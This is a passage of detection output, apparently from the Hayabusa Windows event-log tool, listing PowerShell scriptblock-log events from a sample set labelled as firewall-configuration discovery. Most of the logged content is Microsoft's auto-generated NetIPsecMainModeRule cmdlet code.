'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') 